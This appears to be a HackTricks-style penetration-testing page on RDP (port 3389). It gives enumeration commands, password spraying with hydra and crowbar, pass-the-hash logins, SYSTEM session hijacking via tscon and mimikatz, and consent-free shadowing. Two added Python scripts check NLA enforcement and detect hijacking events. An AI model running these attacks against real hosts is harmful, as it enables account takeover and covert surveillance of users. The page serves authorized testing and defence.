3389 - Pentesting RDP


Basic Information

Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, the user runs RDP client software, and the remote computer must be running RDP server software. This setup allows seamless control of and access to a remote computer's desktop environment, essentially bringing its interface to the user's local device.

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeration

Automatic

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

It checks the available encryption and the MS12-020 DoS vulnerability (without actually causing a DoS of the service) and obtains NTLM Windows info (versions).

Security Layer / NLA Check

RDP can negotiate different security layers (native RDP, TLS, or CredSSP/NLA). You can quickly fingerprint the server-side settings and whether NLA is required:

# Security layer and encryption info
nmap --script rdp-enum-encryption -p 3389 <IP>

# Quick auth check (also reports if NLA is required)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot only works if NLA is disabled
nxc rdp <IP> --nla-screenshot

# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot
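The negotiation that rdp-enum-encryption and nxc inspect happens in the first X.224 Connection Request/Confirm exchange (MS-RDPBCGR). As an added example, not code from the original page or from any of the tools above, this Python script builds that request offering only legacy RDP security, decodes the server's answer and reports whether the server enforces NLA; the sample replies are constructed, and probe() is a hypothetical helper for checking your own hosts.

```python
import socket
import struct

# Constants from MS-RDPBCGR: requestedProtocols bitmask and RDP_NEG_* structures
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER",
                 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}

def build_neg_request(requested_protocols):
    """TPKT header + X.224 Connection Request TPDU carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # LI=14, CR/CDT=0xE0, DST-REF, SRC-REF, class 0, then the 8-byte negotiation request
    x224 = bytes([0x0E, 0xE0, 0, 0, 0, 0, 0]) + neg_req
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224

def parse_neg_response(data):
    """Decode the server's X.224 Connection Confirm.
    Returns ("response", selectedProtocol) or ("failure", failureCode name)."""
    if len(data) < 19 or data[0] != 3 or data[5] != 0xD0:
        raise ValueError("not a TPKT-wrapped X.224 Connection Confirm")
    neg_type, _flags, length, value = struct.unpack_from("<BBHI", data, 11)
    if length != 8:
        raise ValueError("malformed RDP_NEG structure")
    if neg_type == TYPE_RDP_NEG_RSP:
        return ("response", value)
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return ("failure", FAILURE_CODES.get(value, f"UNKNOWN_{value}"))
    raise ValueError(f"unexpected negotiation type {neg_type:#x}")

def nla_enforced(reply_to_legacy_only_request):
    """True when the server refuses a client that offered only legacy RDP security,
    i.e. CredSSP/NLA is mandatory and the pre-auth screenshot above cannot work."""
    kind, value = parse_neg_response(reply_to_legacy_only_request)
    return kind == "failure" and value in ("HYBRID_REQUIRED_BY_SERVER",
                                           "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER")

def probe(host, port=3389, timeout=5.0):
    """Hypothetical live check: offer PROTOCOL_RDP only and report whether NLA is enforced."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_neg_request(PROTOCOL_RDP))
        return nla_enforced(s.recv(1024))

# Constructed sample replies (not captured from a real host), usable offline
_CC_HEADER = b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00"
SAMPLE_NLA_REQUIRED = _CC_HEADER + struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, 5)
SAMPLE_LEGACY_ACCEPTED = _CC_HEADER + struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, PROTOCOL_RDP)
```

A server that answers the legacy-only request with RDP_NEG_RSP selecting PROTOCOL_RDP still accepts unauthenticated pre-login connections and should be reconfigured to require NLA.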

Brute force

Be careful, you could lock out accounts

Password Spraying

Be careful, you could lock out accounts

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Connect with known credentials/hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Check known credentials against RDP services

rdp_check.py from impacket lets you check whether a set of credentials is valid for an RDP service:

rdp_check <domain>/<name>:<password>@<IP>

Attacks

Session stealing

With SYSTEM permissions you can access any RDP session opened by any user without needing to know the owner's password.

Get opened sessions:

query user

Access the selected session:

tscon <ID> /dest:<SESSIONNAME>

Now you will be inside the selected RDP session and will be impersonating that user using only Windows tools and features.

Important: When you access an active RDP session you will kick out the user who was using it.

You could get the passwords by dumping the process, but this method is much faster and lets you interact with the user's virtual desktops (passwords in notepad that were never saved to disk, other RDP sessions open on other machines...).

Mimikatz

You could also use mimikatz to do this:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

RDP Shadowing (Remote Control)

If Remote Desktop Services shadowing is enabled, you can view or control another user's active session (sometimes without their consent) using the built-in parameters of mstsc.

# List sessions on a remote host
qwinsta /server:<IP>
quser /server:<IP>

# Shadow a specific session (consent required if policy enforces it)
mstsc /v:<IP> /shadow:<SESSION_ID> /control

# Shadow without consent if policy allows it
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt

# Check current shadowing policy on the target
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow
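Both the tscon session stealing above and mstsc shadowing leave process-creation telemetry that a defender can alert on, and the Shadow policy value queried above decides whether consent is even asked for. As an added example, not code from the original page, this Python script interprets that registry value and runs simple detection logic over constructed Sysmon EID 1 / Security 4688-style events; the event field names and sample events are assumptions for the demonstration.

```python
# Shadow value under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
# (GPO "Set rules for remote control of Remote Desktop Services user sessions").
SHADOW_POLICY = {0: "remote control disabled",
                 1: "full control, user permission required",
                 2: "full control, no permission required",
                 3: "view only, user permission required",
                 4: "view only, no permission required"}

def shadow_policy_risk(value):
    """Return (description, risky); risky means a session can be shadowed without consent."""
    return SHADOW_POLICY.get(value, f"unknown value {value}"), value in (2, 4)

def classify_process_event(event):
    """event: dict with 'user', 'image' and 'command_line' (assumed field names, as carried
    by Sysmon EID 1 or Security EID 4688 with command-line auditing). Finding or None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"].lower()
    if image == "tscon.exe" and "/dest:" in cmd:
        # tscon attaches a session to another one without a password; run from SYSTEM
        # (a service or a sticky-keys/utilman backdoor) it is the hijack described above.
        if event["user"].upper() in ("NT AUTHORITY\\SYSTEM", "SYSTEM"):
            return "session hijack: tscon.exe /dest: run as SYSTEM"
        return "tscon.exe /dest: run by " + event["user"]
    if image == "mstsc.exe" and "/shadow:" in cmd:
        if "/noconsentprompt" in cmd:
            return "shadowing without consent prompt"
        return "shadowing of another session"
    return None

def scan(events):
    """Run the classifier over a list of events; returns [(user, finding), ...]."""
    findings = []
    for event in events:
        finding = classify_process_event(event)
        if finding:
            findings.append((event["user"], finding))
    return findings

# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    {"user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\tscon.exe",
     "command_line": "tscon 2 /dest:rdp-tcp#0"},
    {"user": "CORP\\helpdesk", "image": "C:\\Windows\\System32\\mstsc.exe",
     "command_line": "mstsc /v:10.0.0.5 /shadow:3 /control /noconsentprompt /prompt"},
    {"user": "CORP\\helpdesk", "image": "C:\\Windows\\System32\\mstsc.exe",
     "command_line": "mstsc /v:10.0.0.5 /shadow:3"},
    {"user": "CORP\\alice", "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]
```

Setting the Shadow value to 1 or 3 (or 0) on hosts that do not need unattended remote control removes the no-consent paths that mstsc /noconsentprompt and AutoRDPwn rely on.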

RDP Virtual Channel Tunneling

RDP supports virtual channels that can be abused for pivoting/tunneling through an authenticated RDP session. One option is rdp2tcp (client/server), which can multiplex TCP forwards over RDP (works with FreeRDP).

# Start FreeRDP with rdp2tcp virtual channel
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

Tunneling and Port Forwarding

Sticky-keys & Utilman

Combining this technique with stickykeys or utilman, you will be able to access an administrative CMD and any RDP session at any time.

You can search for RDP servers that have already been backdoored with one of these techniques using: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

If someone from a different domain or with better privileges logs in via RDP to the PC where you are an Admin, you can inject your beacon into their RDP session process and act as them:

RDP Sessions Abuse

Adding a User to the RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view their victim's desktop without their consent, and even control it on demand, using tools native to the operating system itself.

EvilRDP

  • Control mouse and keyboard in an automated way from the command line

  • Control the clipboard in an automated way from the command line

  • Spawn a SOCKS proxy from the client that channels network communication to the target via RDP

  • Execute arbitrary SHELL and PowerShell commands on the target without uploading files

  • Upload and download files to/from the target even when file transfers are disabled on the target

SharpRDP

This tool allows executing commands on the victim's RDP without needing a graphical interface.

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
